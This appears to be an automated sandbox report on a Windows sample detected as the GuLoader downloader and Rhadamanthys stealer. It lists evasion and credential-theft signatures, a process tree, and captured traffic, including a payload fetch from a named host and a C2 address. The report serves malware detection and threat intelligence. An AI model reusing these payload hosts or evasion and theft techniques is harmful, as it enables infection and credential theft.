Edit tour

Windows Analysis Report
64Tgzu2FKh.exe

Overview

General Information

Sample Name:	64Tgzu2FKh.exe
Analysis ID:	880188
MD5:	9dca43cb15d97693d2de73683804c5c7
SHA1:	3bf61bc542db16e0a045505c2868cd12cfcac769
SHA256:	c3ac750a23fb48eee9e1ce2d9bd59aadbc190a1dd36afbdc9f5c39eeb7f87756
Infos:

Detection

GuLoader, RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected RHADAMANTHYS Stealer

Yara detected AntiVM3

Yara detected GuLoader

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Opens the same file many times (likely Sandbox evasion)

Deletes itself after installation

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Stores files to the Windows start menu directory

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Contains capabilities to detect virtual machines

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

64Tgzu2FKh.exe (PID: 11260 cmdline: C:\Users\user\Desktop\64Tgzu2FKh.exe MD5: 9DCA43CB15D97693D2DE73683804C5C7)

64Tgzu2FKh.exe (PID: 4832 cmdline: C:\Users\user\Desktop\64Tgzu2FKh.exe MD5: 9DCA43CB15D97693D2DE73683804C5C7)

certreq.exe (PID: 9536 cmdline: C:\Windows\system32\certreq.exe MD5: 9E5EA30E8DF2A24833FDB9F2D673C41A)

conhost.exe (PID: 9616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

WerFault.exe (PID: 10068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1232 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	No Attribution	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.1536218122.0000000008A31000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 64Tgzu2FKh.exe PID: 4832	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: 64Tgzu2FKh.exe PID: 4832	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 64Tgzu2FKh.exe	Virustotal: Detection: 12%			Perma Link
Source: 64Tgzu2FKh.exe	ReversingLabs: Detection: 13%

Source: 64Tgzu2FKh.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 64Tgzu2FKh.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: 64Tgzu2FKh.exe, 00000000.00000003.853287489.000000000299D000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.0.dr
Source:	Binary string: mshtml.pdb source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: 64Tgzu2FKh.exe, 00000000.00000003.853287489.000000000299D000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.0.dr
Source:	Binary string: mshtml.pdbUGP source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040595A
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_0040658F FindFirstFileW,FindClose,	0_2_0040658F
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC	Jump to behavior
Source: C:\Windows\System32\certreq.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA	Jump to behavior

Source: Joe Sandbox View

IP Address: 203.175.174.69 203.175.174.69

Source: global traffic

HTTP traffic detected: GET /rh/rheu.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: bluemaxxlaser.com

Source: global traffic

TCP traffic: 192.168.11.20:49850 -> 45.66.230.155:2537

Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155
Source: unknown	TCP traffic detected without corresponding DNS query: 45.66.230.155

Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.bin
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.bin00W#
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.bin2
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.binBfk
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2127439633.0000000034F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.binGoucsFllalramsyadvocates.co
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.binIf
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.binX
Source: 64Tgzu2FKh.exe, 0000000B.00000003.2047710499.0000000005797000.00000004.00000020.00020000.00000000.sdmp, 64Tgzu2FKh.exe, 0000000B.00000002.2115468679.0000000005794000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.bincf
Source: 64Tgzu2FKh.exe, 0000000B.00000002.2114909158.0000000005748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bluemaxxlaser.com/rh/rheu.binz
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: 64Tgzu2FKh.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: 64Tgzu2FKh.exe, 00000000.00000003.855612399.000000000299D000.00000004.00000020.00020000.00000000.sdmp, bn.txt.0.dr	String found in binary or memory: http://www.oruddho.com
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: certreq.exe, 0000000C.00000003.2362710242.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: certreq.exe, 0000000C.00000003.2362710242.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: certreq.exe, 0000000C.00000003.2358519610.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2364067131.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2294813354.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2381391720.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2347137342.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2337010943.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2348460528.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2293648309.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2323288558.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2367034008.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2356041253.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2309566932.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2368527161.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2281491024.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2360225839.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2325891080.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2403232155.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2361474795.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2391200900.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2277711632.0000022346F02000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2271900087.0000022346F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip
Source: certreq.exe, 0000000C.00000003.2269437994.0000022346BC9000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 0000000C.00000003.2262285186.0000022346BCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http:///etc/puk.keyMachineGuid
Source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: unknown

DNS traffic detected: queries for: bluemaxxlaser.com

Source: global traffic

HTTP traffic detected: GET /rh/rheu.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: bluemaxxlaser.com

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004053EF

Source: 64Tgzu2FKh.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1232

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040333D

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_00406956	0_2_00406956
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_00404C2C	0_2_00404C2C
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E62C32	12_3_0000022344E62C32
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E62792	12_3_0000022344E62792
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E64A10	12_3_0000022344E64A10
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E61B9C	12_3_0000022344E61B9C
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E624ED	12_3_0000022344E624ED
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E65E54	12_3_0000022344E65E54
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E65554	12_3_0000022344E65554
Source: C:\Windows\System32\certreq.exe	Code function: 12_3_0000022344E658D4	12_3_0000022344E658D4

Source: C:\Windows\System32\certreq.exe

Code function: 12_3_0000022344E630A7 RtlRestoreThreadPreferredUILanguages,RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,

12_3_0000022344E630A7

Source: 64Tgzu2FKh.exe, 00000000.00000003.853287489.000000000299D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameSharpDX.DXGI.dll< vs 64Tgzu2FKh.exe

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\certreq.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: 64Tgzu2FKh.exe	Virustotal: Detection: 12%
Source: 64Tgzu2FKh.exe	ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

File read: C:\Users\user\Desktop\64Tgzu2FKh.exe

Jump to behavior

Source: 64Tgzu2FKh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\64Tgzu2FKh.exe C:\Users\user\Desktop\64Tgzu2FKh.exe
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process created: C:\Users\user\Desktop\64Tgzu2FKh.exe C:\Users\user\Desktop\64Tgzu2FKh.exe
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe
Source: C:\Windows\System32\certreq.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1232
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe	Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

0_2_0040333D

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

File created: C:\Users\user\AppData\Local\Temp\nslB495.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/8@1/2

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_004020FE CoCreateInstance,

0_2_004020FE

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046B0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9616:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9616:120:WilError_03
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}

Source: C:\Windows\System32\certreq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook

Jump to behavior

Source: 64Tgzu2FKh.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdbLm source: 64Tgzu2FKh.exe, 00000000.00000003.853287489.000000000299D000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.0.dr
Source:	Binary string: mshtml.pdb source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Code\SharpDX\Source\SharpDX.DXGI\bin\Release\SharpDX.DXGI.pdb source: 64Tgzu2FKh.exe, 00000000.00000003.853287489.000000000299D000.00000004.00000020.00020000.00000000.sdmp, SharpDX.DXGI.dll.0.dr
Source:	Binary string: mshtml.pdbUGP source: 64Tgzu2FKh.exe, 0000000B.00000001.1367127206.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1536218122.0000000008A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_0008582C push ebp; iretd	11_3_0008582D
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00083854 push eax; ret	11_3_00083955
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_000838BC push eax; ret	11_3_00083955
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00084ABD push dword ptr [edx+ebp+3Bh]; retf	11_3_00084ACA
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00085323 push es; retf	11_3_00085324
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00085366 push esp; retf	11_3_00085376
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00082F9A push esi; retf	11_3_00082F9B
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_00082FA6 push es; retf	11_3_00082FAF
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Code function: 11_3_000853EE pushad ; ret	11_3_000853F1

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File created: C:\Users\user\AppData\Local\Temp\nseEF5D.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll			Jump to dropped file

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust			Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\certreq.exe

File deleted: c:\users\user\desktop\64tgzu2fkh.exe

Jump to behavior

Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\64Tgzu2FKh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
